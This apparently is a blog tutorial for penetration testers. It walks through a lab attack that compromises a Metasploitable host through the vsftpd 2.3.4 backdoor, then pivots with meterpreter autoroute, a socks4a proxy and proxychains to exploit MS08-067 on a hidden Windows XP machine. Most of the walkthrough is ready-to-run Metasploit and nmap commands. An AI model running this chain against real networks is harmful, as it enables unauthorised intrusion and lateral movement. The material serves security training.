2 minute read

Hello, cybersecurity enthusiasts and white hackers!

pivoting 1

This article I will consider scenarios for attacking protected segments of the corporate network using pivoting techniques via metasploit framework and proxychains.

scenario

Let’s consider at this network topology:

pivoting 1

for simplicity, I chose Metasploitable as machine A and vulnerable windows xp sp3 as machine B

enum and compromise machine A

Often in a real pentest, you do not know the exact address of the vulnerable machines in network, so first I did hosts discovery:

nmap -sn -T4 10.10.2.0/24 -oG - | awk '/Up$/{print $2}'

pivoting 1

As you can see, our target is 10.10.2.15.

Then scan:

nmap -Pn -sV 10.10.2.15

pivoting 1

We found a vulnerable 21 port. But in this case we will pwn machine A via Metasploit Framework. The Metasploit Framework from Rapid7 is one of the best-known frameworks in the area of vulnerability analysis, and is used by many Red Teams and penetration testers worldwide.

Firstly, run:

msfconsole

pivoting 1

In my case I am using metasploit v5.0.87-dev from my kali VM.

Exploitation:

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.10.2.15
set RPORT 21
run

pivoting 1

As you can see, we got a reverse shell session.

enum network intefaces:

ifconfig

pivoting 1

And we discovered another network 10.9.1.22/24.

update our shell to meterpreter:

use post/multi/manage/shell_to_meterpreter
set LPORT 4441
set LHOST 10.10.2.6
set SESSION 1
run

pivoting 1

access hidden network via proxy

Further, according to the scenario, the attacker wants to gain access to the subnet behind the 10.9.1.0/24 interface. To do this, he needs to use a compromised host as a pivot.

Check our meterpreter session:

sessions -l

pivoting 1

The following command can be used to create a tunnel through an existing meterpreter session:

sessions -i 2
run autoroute -s 10.9.1.0/24
run autoroute -p

pivoting 1

We have added our additional route and this route will work during the meterpreter session is not closed.

In order for our tools such as nmap to work on this network, we must configure a socks4a proxy:

use auxiliary/server/socks4a
set SRVHOST 10.10.2.6
set SRVPORT 8090

pivoting 1

Check:

netstat -antp

pivoting 1

As you can see the proxy has been created immediately and you can see our current meterpreter session 10.10.2.6:4441.

Now we configure proxychains. Using the proxychains utility, any TCP connection can be sent to the destination via TOR, SOCKS4, SOCKS5, HTTP/HTTPS proxy. Let’s make a small update in the settings file /etc/proxychains.conf:

nvim /etc/proxychains.conf

pivoting 1

Then, scan via proxychains and nmap:

proxychains4 nmap -sT -p21,22,135,139,445 10.9.1.0/24 2>&1 | grep 'OK'

pivoting 1

exploit and access machine B

scan machine B:

proxychains4 nmap -Pn -sT -sV 10.9.1.12

pivoting 1

so, machine OS is Microsoft Windows XP

check port 445 for vulnerability:

proxychains4 nmap -Pn -sT -sV --script=*smb-vuln* 10.9.1.12

pivoting 1

is vulnerable to ms08-067.

Run in metasploit again:

use exploit/windows/smb/ms08_067_netapi
set payload windows/shell/bind_tcp
set RHOSTS 10.9.1.12
set RHOST 10.9.1.12
set LPORT 4447
run

pivoting 1

Here we used the bind shell, so it’s not necessary to create the reverse route.

pivoting 1

So, the machine B has been pwned :)

conclusion

the attacker discovered secret network by following the steps below.

  • attacker got an access to the machine A (10.10.2.15) which was on same network with attacker via exploitation vsftpd 2.3.4 on port 21
  • then he realise that machine A has 2 network interfaces
  • access hidden network via autoroute in meterpreter session to machine A
  • create socks4a proxy
  • then attacker scan ports on new discovered network 10.9.1.0/24
  • scan ports on 10.9.1.12
  • machine B have vulnerable smb on port 445
  • successfully exploit ms08-067 on machine B
  • final

first part
pivoting via metasploit
metasploit
proxychains

This is a practical case for educational purposes only.

Thanks for your time, happy hacking and good bye!
PS. All drawings and screenshots are mine